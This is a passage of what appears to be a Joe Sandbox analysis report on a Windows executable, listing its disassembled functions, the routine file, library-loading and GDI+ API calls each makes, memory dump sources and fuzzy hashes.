              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: cf404ef89b8cbe93e13878bd533b8eafe20946295ff70f7b424435dc8286e279
              • Instruction ID: 6bd9e77d5b6f68767c7ca07111ca3dda37426ba28082d0ec1d2cb5dc06a9a631
              • Opcode Fuzzy Hash: cf404ef89b8cbe93e13878bd533b8eafe20946295ff70f7b424435dc8286e279
              • Instruction Fuzzy Hash: F4F082312402097BDF016E60DC85FD9779CAF04781F488091BC4886171DB7199A8EB50
              Function 00B9D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: a548c4b440cfff051cd35b91ad41c7e74de89dac0fef55b8a317ea610085ba74
              • Instruction ID: b22339a533a8f6ab8e5ea596372a9b7d148b809b81cb8931040afe33bb02146d
              • Opcode Fuzzy Hash: a548c4b440cfff051cd35b91ad41c7e74de89dac0fef55b8a317ea610085ba74
              • Instruction Fuzzy Hash: D5F0E5716043487BEF11BBB0DC07FAE379CEB08746F0405E6B601A71B2DE716A608762
              Function 00B8A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,00B8984C,?,?,00B89688,?,?,?,?,00BB1FA1,000000FF), ref: 00B8A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00B8984C,?,?,00B89688,?,?,?,?,00BB1FA1,000000FF), ref: 00B8A16C
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 2f1ff3801d5c3b9562ea536c14a195369a576c70321f4c962035525f732cde41
              • Instruction ID: 510b6f24dbb6f19d1caf53405d11fd2296d74b6a0f0374194afbb76d99fe09be
              • Opcode Fuzzy Hash: 2f1ff3801d5c3b9562ea536c14a195369a576c70321f4c962035525f732cde41
              • Instruction Fuzzy Hash: 64E06535545208A7EB11BA60DC45FE977DCAF05781F8440A5B98493064DB61ED94DB50
              Function 00B9A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00BB1FA1,000000FF), ref: 00B9A3D1
              • CoUninitialize.COMBASE(?,?,?,?,00BB1FA1,000000FF), ref: 00B9A3D6
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: 27ca58fbaafa80e7155919e2559cb7accaeba812fc3bbe669be078471294fbd5
              • Instruction ID: 89dac15c90dc634221a967f05f62645f31057d5371d25b9c38dfec777fb32964
              • Opcode Fuzzy Hash: 27ca58fbaafa80e7155919e2559cb7accaeba812fc3bbe669be078471294fbd5
              • Instruction Fuzzy Hash: C6F01532A18A54EFC6149B4CDC45B59FBA8FB89A20F0443AAA41993760CBB4A800CA91
              Function 00B8A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,00B8A189,?,00B876B2,?,?,?,?), ref: 00B8A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B8A189,?,00B876B2,?,?,?,?), ref: 00B8A1D1
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: aa08f65afd3470062be8ea169dd59c423657ca293a2dd4825a0e1a48d275516b
              • Instruction ID: 42019a47f01620e3f4d736190263423003b539f4de47b7b12397d1217ffe0039
              • Opcode Fuzzy Hash: aa08f65afd3470062be8ea169dd59c423657ca293a2dd4825a0e1a48d275516b
              • Instruction Fuzzy Hash: 75E06D35500128ABDB21BA68DC09BD9B7D8EB097A1F0042A2BD54E32A0DBB09D449BE0
              Function 00B90085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
              Download Yara Rule
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: 2b01d4c0630c2dde88be4b334d0814f49375d6c3007416d53ec92f549270adb5
              • Instruction ID: 80891b7cb13214cf725cc2d2177114d33af7b3c01cb3a9907ea56fbfa2e5c0f2
              • Opcode Fuzzy Hash: 2b01d4c0630c2dde88be4b334d0814f49375d6c3007416d53ec92f549270adb5
              • Instruction Fuzzy Hash: B7E0127691112C6BDB21AAA4DC05FD677ECEF09782F4400A6B948D3114DAB4DA44CBA4
              Function 00B99B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
              Download Yara Rule
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B99B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B99B37
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: f9ffea687d1dd44c37cdb9a91aeda54c72deef8dc4542236d06b95794c92d969
              • Instruction ID: 782f5f7403bb6184fdb9d30734b0a42ab2d49c3f6f65209a2eff0250172b55a3
              • Opcode Fuzzy Hash: f9ffea687d1dd44c37cdb9a91aeda54c72deef8dc4542236d06b95794c92d969
              • Instruction Fuzzy Hash: B6E0ED72901218EBCB50DF98D5416A9B7ECEB08721F1080AFE89593301E7B5AE049B91
              Function 00BA215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00BA329A: try_get_function.LIBVCRUNTIME ref: 00BA32AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BA2185
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 88ea9314ad1b6c2c5288d1821aa8db130af75b4bb22b2c8fcc5c92575bfcf0e9
              • Instruction ID: 76c941e68839d8bb97ff976d519484d8b3c4f6b719ae978648fd907f02545d37
              • Opcode Fuzzy Hash: 88ea9314ad1b6c2c5288d1821aa8db130af75b4bb22b2c8fcc5c92575bfcf0e9
              • Instruction Fuzzy Hash: 3CD0C935A4C346286D6827BCA8925A923C49953FB53F00BC6F731AA4E2EE618145A511
              Function 00B9DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • DloadLock.DELAYIMP ref: 00B9DC73
              • DloadProtectSection.DELAYIMP ref: 00B9DC8F
                • Part of subcall function 00B9DE67: DloadObtainSection.DELAYIMP ref: 00B9DE77
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: 2ac86863da25e447fbaa6549f9400e591500e092a165c7ac19b6a7e9587960a2
              • Instruction ID: 25e3e617ebde3a0b6463f34cc6a74c45d9ac9126a798a480f192295e92200576
              • Opcode Fuzzy Hash: 2ac86863da25e447fbaa6549f9400e591500e092a165c7ac19b6a7e9587960a2
              • Instruction Fuzzy Hash: 74D0C9741102805ACE25BB56998672C22F0F724744FB406E1A1058B2A1DFE484E2C616
              Function 00B812E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: 2240e7e6ef6b1a296ddba2f1d44014e2d02a4e39fe779fc050c0be194bf5da1f
              • Instruction ID: e9f682c76115d47f986ed94e02df9a53bd10a61263ec47d697cb8894de782102
              • Opcode Fuzzy Hash: 2240e7e6ef6b1a296ddba2f1d44014e2d02a4e39fe779fc050c0be194bf5da1f
              • Instruction Fuzzy Hash: 23C01232058284BECB010BB0DD09D2FBBACABA4212F05C908B2A5D2060CA38C110DB12
              Function 00B819A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3243fc64fe2691c23dac69408784e7f85ee0abee10328fa7c7837dfd75eb5a66
              • Instruction ID: f5b78cefc8433aaee46d510dcb434748b319c606f6ea6484305c885e0687c9c4
              • Opcode Fuzzy Hash: 3243fc64fe2691c23dac69408784e7f85ee0abee10328fa7c7837dfd75eb5a66
              • Instruction Fuzzy Hash: 7AC18170A062449FEF15EF6CC484BA97BE9EF05300F0848F9DC469F2A6DB719946CB61
              Function 00B83B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 18c16a5cecabc7c58db07c9f30218900dedcab8881e02b249ecf8d9364d417fb
              • Instruction ID: 30c5b67eaf6a899741c19369cbb9a1e987930f144601666c1a1bca33767c2f47
              • Opcode Fuzzy Hash: 18c16a5cecabc7c58db07c9f30218900dedcab8881e02b249ecf8d9364d417fb
              • Instruction Fuzzy Hash: 0471F271104F44AEDB25EB74CC81AE7B7E8EF14B01F4449AEE1AB47262DB316A48CF10
              Function 00B8837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B88384
                • Part of subcall function 00B81380: __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B81380: new.LIBCMT ref: 00B813FE
                • Part of subcall function 00B819A6: __EH_prolog.LIBCMT ref: 00B819AB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 63c6062027d2366ef5daa1f7adab26047e0d5245a6ab0ec4371cc437fcc6bec8
              • Instruction ID: 60f22c44d763459392882374779596119166855b3f3f8cbac5237ecb605e49be
              • Opcode Fuzzy Hash: 63c6062027d2366ef5daa1f7adab26047e0d5245a6ab0ec4371cc437fcc6bec8
              • Instruction Fuzzy Hash: A34191328406589BDF24FB60C855BEA73ECEF50300F4844EAE58AA31A2DF745AC9DB50
              Function 00B81E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B81E05
                • Part of subcall function 00B83B3D: __EH_prolog.LIBCMT ref: 00B83B42
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3918f6e643ae49b47bc14d8ccc3bc28d6df607fe3a17b53fc4a05c546902b188
              • Instruction ID: dbe5b8f26814f58cad179eb6809a600577a23d59264aac0ed6f37f0ce481cfa2
              • Opcode Fuzzy Hash: 3918f6e643ae49b47bc14d8ccc3bc28d6df607fe3a17b53fc4a05c546902b188
              • Instruction Fuzzy Hash: 0D213772905109AFCF11EF98D9519EEBBFAFF58300B1008AEE845B7261CB325E11DB60
              Function 00B9A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B9A7C8
                • Part of subcall function 00B81380: __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B81380: new.LIBCMT ref: 00B813FE
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 692ab44032323bfec73e39bcc426a7acbaaa651f937e82cbc2ec8026e6e5048d
              • Instruction ID: 38445d835ccdad5e3cdd2cb8d114e92dbad6bf61dd2defa77c4d356cc2ab639a
              • Opcode Fuzzy Hash: 692ab44032323bfec73e39bcc426a7acbaaa651f937e82cbc2ec8026e6e5048d
              • Instruction Fuzzy Hash: E6214F71C05249AECF15EF58C9925EEB7F8EF19300F1004EEE809A7252D735AE06DBA1
              Function 00B892E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 9e14ad0473bf48053e6c686a17b5fef209d03534294ce7eb011b678b6425ba92
              • Instruction ID: 6869847a8cd98e757817c51327ac40475487460d6faff4bab1e6814415fc503f
              • Opcode Fuzzy Hash: 9e14ad0473bf48053e6c686a17b5fef209d03534294ce7eb011b678b6425ba92
              • Instruction Fuzzy Hash: 07118E73A005289BCF26BBA8CC519EEBBB6EF88750F0441A5F814B7261CA34CD10C7A4
              Function 00B8AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: d4ec492dd918e0b1d9975c1b6fc8855b0b01e39e5a9a07d823ea556542999e90
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: 64F0AF30500B059FEB38EF74C981616B7E8EB11330F20899FE496C3AA0E770D881C752
              Function 00B85BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B85BDC
                • Part of subcall function 00B8B07D: __EH_prolog.LIBCMT ref: 00B8B082
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: cf9da97dd0bc2ddefb78234fd1b5ab1bdd1a9c587097187751fad8e44ec8f826
              • Instruction ID: 4b7ccd8dfe7fa0d608d2ef9b1f8adbbd56961d63899db36fe98dfeffa552e625
              • Opcode Fuzzy Hash: cf9da97dd0bc2ddefb78234fd1b5ab1bdd1a9c587097187751fad8e44ec8f826
              • Instruction Fuzzy Hash: A601D130A10688DAC724F7B8C0157EDFBE49F19301F4040EDA85A132A3CFB01B09C762
              Function 00BA8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
